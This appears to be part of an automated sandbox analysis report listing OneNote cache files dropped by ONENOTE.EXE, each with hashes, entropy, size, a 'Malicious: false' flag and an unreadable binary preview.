MD5:	1D551D3B7FC1389EB14D83482D5B3C02
SHA1:	3BDAB3E957F5B45BE67273E0DC0DE1CC225C97B2
SHA-256:	6520670D430FD676BEAA8D5A28A4D8999DEDF424A0AD6288BC8CA62F82E761ED
SHA-512:	281A3CD4B9E26F7D6FF49519FF12842E5B03E5F0E76DB426BE16FBFDA730007187975B13E7AB893AC40E2D6FFFC0C057DFEA29223692BEAC5F3142F5D5A1C894
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................................3..q....I.......I.qk..B.....LZ.........3..q........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............2...J$..;..mr.D....N...^...................S.:K.z.;............f........................................I.qk..B.....LZ.............2...J$..;..mr.D.........2...J$..;..mr.D........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000018.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.101789036166384
Encrypted:	false
SSDEEP:	48:8np+sTClNp8t9tsEno3CXo92VNTo0rdlrmI5dX3ykgyNKa:8wsKNp81sEVXo92VNTFRphMGNK
MD5:	D0FC5C69C136E742EA300F325B90C0B8
SHA1:	F187B6246FEF81BFF5003E9D5C80004C6DD9180B
SHA-256:	5A4A3F7BB94130619B0232F71D06C52D9F011120E33CAEC8AE2250637E6881C3
SHA-512:	061A164E5634B329F936628070D962566444183E9E18F3FB8F9FEC3BABBC9AA4DA96A0B4AE5562F446454D57CA89665FB4839F3E746A0849DFDE074CDE96444B
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ.p.......p......'..D...p......'..D...p...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............@..7p..66.P.7z_....N...^................A....H...r............f........................................I.qk..B.....LZ.............@..7p..66.P.7z_.........@..7p..66.P.7z_..........p.......p.......p...........................................p.j.....p.T.]...p.......p..B...p.H.....p...B...p...>.).p...J...................;........4...4...4.."...............p...p...p...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........p.......p.....#.p.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000019.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.088541314296601
Encrypted:	false
SSDEEP:	48:hsk8GhzH2N8YmtDqutsEdbXM9QWiiToNrddrTIudX6Wk26fEa:hsSz68YmYMsEJXM9QWiiTsRR9Td8E
MD5:	E06E32F4A933B8FE6356D8603A64F31E
SHA1:	6ABCB3936765A10FE1C8AABC5773DAD12869A203
SHA-256:	BBCDB0199D80F485ED8B791CF277B8CFCB44B9D1BFAF2132B076C711C1413A8D
SHA-512:	AF40521A40809CE87C1216D1488B23AF706255545CE63362C9C67201008CC18F5D4CF9D21C057217133954FFA75284B4347FDBB626EAEE6DDBDCD9229906CE13
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZV.......V....U..-......V....U..-......V....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............u.....6.I..'....N...^................eK*y.KB.....\........f........................................I.qk..B.....LZ.............u.....6.I..'.........u.....6.I..'.........V.......V.......V...........................................V..j....V..T.]..V.......V...B..V..H....V....B..V....>.)V....J...................;........4...4...4.."..............V...V...V....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........V.......V......#V..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.129924881168355
Encrypted:	false
SSDEEP:	48:2sxqdnZJg0tHHxNktEt4X2l9HdpTowrdjrk3IldXDxdWy9hig:2sYZJg01RyEqX49HdpT9RvkuH
MD5:	14BBCFFE62B212B72461A437EEF33E0F
SHA1:	C194D57C0A0492FF9E75DB3DE4066E944990B485
SHA-256:	5CE2F8DF59E446C4F1345D09606B499DF0EEB39826A2EEE0528B133104967ADE
SHA-512:	9C39D2C2A9C0A6BDD6DD02F82FCF9F03AC4BB70EDD4330F11D1DF6B0AD22C43D7B88962AC29DA2BC75B55B472B430B61D8A840AC06A66C0018B8E10AF4842C32
Malicious:	false
Preview:	2...>.......0...v...$.................................................?....?............................................................................2...>...........v...X............................I.......I.qk..B.....LZ............z...5&.nm.=.....z...5&.nm.=......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............+....h..3lK....S....N...^...............Z.\|.$g\H....eZ&x........f........................................I.qk..B.....LZ............+....h..3lK....S........+....h..3lK....S........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.188678660686757
Encrypted:	false
SSDEEP:	96:SsehuMxWk0SQu7EPIXw9ZTKRI5DnsuPj3VN:Ss2xWkm5wXw9ZWRI5
MD5:	820D93EA04C69EB4CE45A6DFD3F0692F
SHA1:	FC9C0445A5014DFB7CB124943D9B1CBC350FB3B0
SHA-256:	829C82A08E9588F7B7ECBC1F9D4FB29337A6B77D420A53AF8CF4B2133A57C030
SHA-512:	8AD9B4EA36007DD0D18541470E26C22FFF279155DFA7A128EB29463C599197F568E5A4F16BBBE5CA5B3F9C22B17C378F6E12F375A2B39C72D9C0CA545B473859
Malicious:	false
Preview:	2...>.......0...v...$.................................................?....?............................................................................2...>...........v...X............................I.......I.qk..B.....LZ...........<.UN..<..:.....<.UN..<..:.......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............J#S.V...4[..0.......N...^..................9 OC...]z.U........f........................................I.qk..B.....LZ............J#S.V...4[..0...........J#S.V...4[..0...........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.112808546217453
Encrypted:	false
SSDEEP:	48:LO0s02RHas9tgMueEBAC+rxIXzTI9/YuB+xToFrdSrYIKdXyOQgN9:LO0s5as9aeEBA7uXA9d2TwRKYR
MD5:	D82379B48C2760656A4C15A8E7EA4560
SHA1:	88273D9F267094C30B87070998B99DB5EF79AF74
SHA-256:	E3B5B4A48C1989A1A13079B0F93505374A2249B6EA72BD35D03FC05CD67176DF
SHA-512:	204942778657839BCAFA4761663BFDAE1A2857530B966C38EE7CAFE2E50DFF0FD762E7B20A367A9B24FFB950222E64C01ED0CEBD7A880669FDA3E3799FD38DF4
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZmI......mI.,.....#.r.-.mI.,.....#.r.-.mI...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............gnaq....19.[2.PB....N...^.................3...(J.....9..........f........................................I.qk..B.....LZ............gnaq....19.[2.PB........gnaq....19.[2.PB.........mI......mI......mI..........................................mI.j....mI.T.]..mI......mI...B..mI.H....mI...B..mI...>.)mI...J...................;........4...4...4.."..............mI..mI..mI...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........mI......mI.....#mI.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.123250123062601
Encrypted:	false
SSDEEP:	48:hTsxW06d0V1zItvQDBOE7CWbXo935TToerdSrWIXdX1e9MqBJ:hTs8eVJI20E75Xo9lTnRKf+B
MD5:	0092154E71A6D5EEE8E9B020707502F2
SHA1:	EB0DD414001CAF6AE2ACCDD5D831E420B921292E
SHA-256:	75897A7A2D81800DBC70C7D87BF08AC5C3CF29D33463FDCAA5C220C0B5961D87
SHA-512:	9F869E8BE73588DC825761EFBE9A9F334CF9B34C084FA4D3FCA3711D20C13B711F5AD2E25CB92A11D2F1AFB8F3F3F86843D69826B71E68B5E083A4E3BC8F4840
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.h.......h.p......w.X.a.h.p......w.X.a.h...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................6U.....R.......N...^................atH..K.z..............f........................................I.qk..B.....LZ...............6U.....R..............6U.....R.............h.......h.......h...........................................h.j.....h.T.]...h.......h...B...h.H.....h...B...h...>.).h...J...................;........4...4...4.."...............h...h...h...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........h.......h.....#.h.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.106345285500157
Encrypted:	false
SSDEEP:	96:Rsf02fOxEE4XI90TxsJTVRKmPw96kU9A5y:RsRfrRXI90eJBRKm
MD5:	F293D8AF1ED0D827D2135395A42B7419
SHA1:	D352F9F89DDE4095C27271238C7478AA600CB41F
SHA-256:	A8ACFCDA18A1DBB56C2E64B686FB58FF7A9242D832B249556383F47511F1AE99
SHA-512:	DAC4E609EB1FC51666E6264881C228ED67A699B9DA2A9A8BA5065A5F0A2D004EEB1158FF34FA4A54342E642ACCB49C7A6C84DD6A47A08E6EF6352181F5D304E7
Malicious:	false
Preview:	2...>..........v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ...........DF..2.........DF..2...........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............~.Z.'./0U.......N...^...............`..S.YF.&rjt:.........f........................................I.qk..B.....LZ..............~.Z.'./0U.............~.Z.'./0U...........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.122434837726065
Encrypted:	false
SSDEEP:	96:mOmMsOuLkIFQ1E2hXA9rXTFRKnZxdisydZOo:FmMsjLkIFtGXA9rXhRKnZ
MD5:	DA5C78A85C6A230BA7511C5A7CDC17D7
SHA1:	DA5AC9808EB834A8D743628E02EA3A00E80528D4
SHA-256:	EAEE1112B2CAC740DBADEE3CA29D230D836F7A0FD79E474F3830853BBC87E2CD
SHA-512:	374505AD6A2C15873E4CE6AFFFE82FF1221B7F5214F0C3D75CEBAF9FF9A9357CC9898F434CB34B47CBFB47C922B955794422581995AAF8A81B8A0DEF78EAA62C
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZiZ&.....iZ&3..3....._2.4iZ&3..3....._2.4iZ&..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............../..e..\.G1.......N...^...............q.m....D...:...........f........................................I.qk..B.....LZ............../..e..\.G1............./..e..\.G1............iZ&.....iZ&.....iZ&.........................................iZ&j....iZ&T.]..iZ&.....iZ&..B..iZ&H....iZ&..B..iZ&..>.)iZ&..J...................;........4...4...4.."..............iZ&.iZ&.iZ&..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........iZ&.....iZ&....#iZ&............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.145290896022385
Encrypted:	false
SSDEEP:	48:hiEsSlyWsBgMtJeGEG9CCZUYX7bY9DxN1To2rdSrVIXdX1+4Gp:hiEsHBgMFEijX7k9DZTnRKeo
MD5:	F5817A1E01FF711BD0811EC837AB2866
SHA1:	2A20353C6A56E70C1AB55BEF38C058A092D05C54
SHA-256:	099F626A9C25B6F24EC2D0FE60ADEFFE2E3FE8A9075F3064269FD0EBDA0B252B
SHA-512:	2663056E96DC2E2BAD471A5C66AF575ED30FB18BEE9D6E2714D86887AD2EA0DC5DE60D2CE43919CFB3C86EE6F7A33A9D2DD2EC1D98BE4D6738BFE42AF3F12BC5
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZY.......Y..w+E).....v}.2Y..w+E).....v}.2Y....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............,.......W..s......N...^...............(~;._\|/O.a0=...2........f........................................I.qk..B.....LZ.............,.......W..s...........,.......W..s...........Y.......Y.......Y...........................................Y..j....Y..T.]..Y.......Y....B..Y..H....Y....B..Y....>.)Y....J...................;........4...4...4.."..............Y...Y...Y....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........Y.......Y......#Y..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.025992211095639
Encrypted:	false
SSDEEP:	48:BsKivS0rqg5tgEEOEnpDCZPCX09wvC6ToPrdSr+4IEdXgEfBc7WbHMfOF+zG:BsTzrqg5KQE1hX09ANT2RK+K3bn
MD5:	FE8DB7DD522F38D25E08129FC83FF1A2
SHA1:	877A201342B6E60B1206CDDD8C43D35924CDA024
SHA-256:	1FADC89378584125FEBBC4061AE88C572ECD911B289118BE7C1E1E819C5505BA
SHA-512:	A77E1193D79034C7F670BE03E585A858EAE8BC978CF8ACA19F81263FD70930CEE301B4B2D250D234341BE407727B5533032878F6576B70CCC02DC0245C0D1181
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.................4$@zf.n.........4$@zf.n.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............I....Z....t..+6....N...^...............(......F....u...........f........................................I.qk..B.....LZ.............I....Z....t..+6.........I....Z....t..+6........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.107212670255703
Encrypted:	false
SSDEEP:	48:ps3dcvYCHlNtd2qEmCKJXo9JALEwBTobrdSrlmIgdXoWkm1:ps/arT1Em3Xo9mL3T6RKlYb
MD5:	0FCA0CD471EC31629EC14D0ADA90C83C
SHA1:	F503CDA0A1A4054A5E85A79AA24FC1BF4D0CCA1B
SHA-256:	F01063535B82D1593627C623B6F54560F81B93053A00D5CFAC1DC9484041D403
SHA-512:	44D0FFE6CEC718AE8208572F64B240907F8397F46EB4E60E8F8B31B652AA64D48901B89C6351B35398F86BE39BCF9985ADFE5FE83EEF031934CE920102695116
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.;6......;6...N../..Omwr.;6...N../..Omwr.;6..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............^.&...!a....v.....N...^.................>.X.AA.T.u.p..........f........................................I.qk..B.....LZ..............^.&...!a....v...........^.&...!a....v...........;6......;6......;6..........................................;6j.....;6T.]...;6......;6..B...;6H.....;6..B...;6..>.).;6..J...................;........4...4...4.."...............;6..;6..;6..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........;6......;6....#.;6............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.123800460835205
Encrypted:	false
SSDEEP:	48:Kx+zshNyPetqQElCC5gX09KzTo4rdSr+IuSdXjsC0QEC2p:K0s2Pe1ElC7X090TdRK+Su/
MD5:	67F8F97AA97235DDF1E0B619ED03DDE8
SHA1:	E9293AAF5A692E563BA6B37F2DDE837755942E91
SHA-256:	D047F15113A86CEF54982F3EFBA1B22A466EDAE62458FF234D560837DEFC5AEA
SHA-512:	92B948AA563A4D44A5ADC41825F0FE7E838943117DFDC217D38602779E4A48679C23DD3C472159B9CB62B137F84DAC1E7F36717A902337E2AC6F5D1692E7B4AA
Malicious:	false
Preview:	2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZE./.....E./..o..G..!in?E./..o..G..!in?E./..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............b......\n..a......N...^....................n.J.6c.\Knn........f........................................I.qk..B.....LZ..............b......\n..a............b......\n..a...........E./.....E./.....E./.........................................E./j....E./T.]..E./.....E./..B..E./H....E./..B..E./..>.)E./..J...................;........4...4...4.."..............E./.E./.E./..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........E./.....E./....#E./............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.114296544506017
Encrypted:	false
SSDEEP:	48:KHaJsU9V6LZ2qkXRtukE6tiC+GvXk9GaTonrdSrDIsdXdyd0QRVajJ:K0sQ6N2qiRVE6c74Xk95T+RKDiw
MD5:	E283169A6552ED81F17E7694CDE8A27B
SHA1:	EE945E61801950FEC285CDEB0444DC64D9B9EC49
SHA-256:	99E9B1F4A6656CC7BC9DC11D4C4DFF4AA7C1208A89D9293A5C87E256A08272F8
SHA-512:	2E3BD95C7D130ADF52661E2BBEE265085E9DD2FA55DE9E0FCE9A3ACBF2B7712417468B393994FC210925D21597237921F7B5AA5A0D198FFF630AB217182EEB34
Malicious:	false
Preview:	2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ.lA......lA].W..4E..92?..lA].W..4E..92?..lA..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............O.uB t..~}.........N...^................*X..%.@.b..C...........f........................................I.qk..B.....LZ.............O.uB t..~}..............O.uB t..~}...............lA......lA......lA..........................................lAj.....lAT.]...lA......lA..B...lAH.....lA..B...lA..>.).lA..J...................;........4...4...4.."...............lA..lA..lA..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........lA......lA....#.lA............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.141717431122023
Encrypted:	false
SSDEEP:	48:QJIpmskmZlRKtEwDmEIWCCYaXc9EUujF7TomrdSreI/dXB3R11:QipmsHRKuwKEPBXc9EjZ7TvRKP/
MD5:	CEB5E77DF755765DE0C581CBF1606AE6
SHA1:	07B8C6AC24E0599CF7BDFB4214146612D935EA69
SHA-256:	2A63D98DDCC3AE08BB55646D14ABB3C79BDF6602EFDB2945F39571514F83353D
SHA-512:	8BA030BD5F971ABD31F7FFE653EC25C0D842196D08E7CA7C29F50F81123273BAEF97372E560822981B045BB2DD71D9B6B747055567522E97DC0B9AAD8FCEF1CC
Malicious:	false
Preview:	2...>...........v..."...................................................................................................................................2...>...........v...V............................I.......I.qk..B.....LZV.......V...FG........\|}V...FG........\|}V....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............~.6Q!.-.....6`.....N...^...............i.V.\|..B..u.<4..........f........................................I.qk..B.....LZ............~.6Q!.-.....6`.........~.6Q!.-.....6`..........V.......V.......V...........................................V..j....V..T.]..V.......V....B..V..H....V....B..V....>.)V....J...................;........4...4...4.."..............V...V...V....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........V.......V......#V..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.114643774240227
Encrypted:	false
SSDEEP:	48:dsYzu9UDt82EVC/JXM9/rgToJrdSryIKdXSS86Z:dsrUDJEVUXM9ETERKOl
MD5:	D3AB9E438D2AF50C63DCDC3E19A2DCC1
SHA1:	9943AA30F511AA2BF4BE9AC3ADD641AB8EFF3EFF
SHA-256:	01598A042728ED8CCDA9303C32E6AC0F5AF374F523E2301C55744EB269312754
SHA-512:	66F58E091672365038893F6D4E8D2639D8EA724E00E0985793051249489B9C15903D364516D1F85B17B18CC96BA69B46EBFC10F0A81CB903DA456F25ED2F27A1
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.ni......ni]....'QVX..YC.ni]....'QVX..YC.ni..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............~..,O.E..l...&9M....N...^...............%%..t.~H...............f........................................I.qk..B.....LZ............~..,O.E..l...&9M........~..,O.E..l...&9M..........ni......ni......ni..........................................nij.....niT.]...ni......ni..B...niH.....ni..B...ni..>.).ni..J...................;........4...4...4.."...............ni..ni..ni..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........ni......ni....#.ni............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.134472419075703
Encrypted:	false
SSDEEP:	96:rAcs0S28m+uvFLEsWMCX09EPTuRKJEurH+8tMr8V7tWrHSFE:ps0p8m+uNI8CX09EPyRKJBy8tMoV7E
MD5:	9E3FCA2A465E2F34B5200CF71294FCC2
SHA1:	869706F9993DF56313059FDC1F37C1332333276F
SHA-256:	AEB4FEFA028EB455ECC3A4075B0E200607189676D4B32FBD52F060E959D97166
SHA-512:	53042C8FC82695668B98A83D4D742BF652CD0425994818BB731DFEF1EDB7DEB40D23388067BB816F0330304E661EA30CCCE0FDE7E41F78C5F571BF6D36F4AB4A
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.....................?...............?.......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............. .....:..L...s#(....N...^......................F..4.E. .........f........................................I.qk..B.....LZ............ .....:..L...s#(........ .....:..L...s#(........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.126425259916883
Encrypted:	false
SSDEEP:	96:psgMoMaOJlAZMER3cKX89UylB7TXRKGkw:ps8MaEAZpxTX893tzRKGk
MD5:	7DD2D9E55651BE8C641E56DA583AFD23
SHA1:	959E677D983C83269D079811203DB44DCCB000C2
SHA-256:	9042D3D43D6267E20F10AF692A6058A0BD94F749097F7E163C01C1BD86E45E7A
SHA-512:	287F77C68E7D406CAFA116184480FFA120F55182082F21EB796901E6E1CF17685744ECE4392075C1C2571C693A2D90652B3DA3655DEC398AB1B4A09A2C2F1B2E
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R...........................&.......&..9,.q.........I.......I.qk..B.....LZ&..9,.q........&....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............t.{....9c..>Y......N...^...............Uh.6...O...............f........................................I.qk..B.....LZ............t.{....9c..>Y..........t.{....9c..>Y...........&.......&.......&...........................................&..j....&..T.]..&.......&....B..&..H....&....B..&....>.)&....J...................;........4...4...4.."..............&...&...&....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........&.......&......#&..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.019241619553836
Encrypted:	false
SSDEEP:	48:PDBsiXvNuU9mHm0t8iENAIWCp2hdX49fXRlvToVCrdSrsoIxfDdXzSKu3wKvxnF:1sQmHr1ENA1s2TX49ZVTBRKsDfDG
MD5:	3AC986FCFDA5B53D79B4CFF61D5986A9
SHA1:	4D5080C8D64A6C37428229A105801576327E16E9
SHA-256:	AA0404882FE65FD56F38B62AC95D3E2F2E79EBC8F329494974694124DCF32F6D
SHA-512:	AEF8215287A99B46BB0B1E99EA341849964A0C21098A22836BD77CF9DFED5EEDB1B4D44B910C56B5ABA7991B0E1740A654C70ADC56B505EB664905C626743D68
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ..#.......#T.b..4.v....-..#T.b..4.v....-..#..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................ty....(...P.n....N...^.................).. .I...%............f........................................I.qk..B.....LZ...............ty....(...P.n...........ty....(...P.n...........#.......#.......#...........................................#j......#T.]....#.......#..B....#H......#..B....#..>.)..#..J...................;........4...4...4.."................#...#...#..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........#.......#....#..#............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.108534863835946
Encrypted:	false
SSDEEP:	96:Kqlsqa7tzZPEyrWXk9EkMJT+0RKeH7viWavPAs:/sP7tOyqXk9iq0RKe
MD5:	6A99FE67E1C901787160D6DA404336BB
SHA1:	E3D2C7E5718B3CBB8F867C8CFD5D8F3C6333875E
SHA-256:	E57CE418F8809FD45A2D857C55CCA560E1549304043C4946ACDA86F6B3ACF166
SHA-512:	5229C18228D8270D669CAE4EF5215A46D01DC65EEF4DDC2DF005FA7917E9C5CBF2DD19AC8287CAC0636A5D93CB0298BAFB4875634FCEC1F70F37A2E7A5608EF5
Malicious:	false
Preview:	2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZKqK.....KqK.8.....]a...KqK.8.....]a...KqK..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Ez.hL@..7..Bj../....N...^................l./X@.D.x.'...1........f........................................I.qk..B.....LZ............Ez.hL@..7..Bj../........Ez.hL@..7..Bj../.........KqK.....KqK.....KqK.........................................KqKj....KqKT.]..KqK.....KqK..B..KqKH....KqK..B..KqK..>.)KqK..J...................;........4...4...4.."..............KqK.KqK.KqK..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........KqK.....KqK....#KqK............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.128767924111901
Encrypted:	false
SSDEEP:	96:LsjPyO1uyjEXlXS9ovTfRK+OR5PV2kRUJmK:Lsp1hQ1XS9YDRK+c
MD5:	35889BFCA4EB943C4AAF50021422CF29
SHA1:	4191614BFAC7C5229BD8E2EB11ECFF57E56BB361
SHA-256:	C38BBCF9A0FFF953B25DA65F6F6B75DF58D4E569A347CE27E4C251B0B98B5355
SHA-512:	61186D305E2F86C55BA74A0B56092F231697BBC0C57AC92A232957D50EF054DDFB0A51605FA22FE3E283DAC3B5D893E69452BFC0408FF71FBD171122B19B1266
Malicious:	false
Preview:	2...>.......(...v.......................................................................................................................................2...>...........v...P............................I.......I.qk..B.....LZ.r.......r...3....0...4'.r...3....0...4'.r...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............m.#.i.;./.....[h....N...^...............c.O\|@..C...._x..........f........................................I.qk..B.....LZ............m.#.i.;./.....[h........m.#.i.;./.....[h..........r.......r.......r...........................................r.j.....r.T.]...r.......r...B...r.H.....r...B...r...>.).r...J...................;........4...4...4.."...............r...r...r...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........r.......r.....#.r.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.6171413175300526
Encrypted:	false
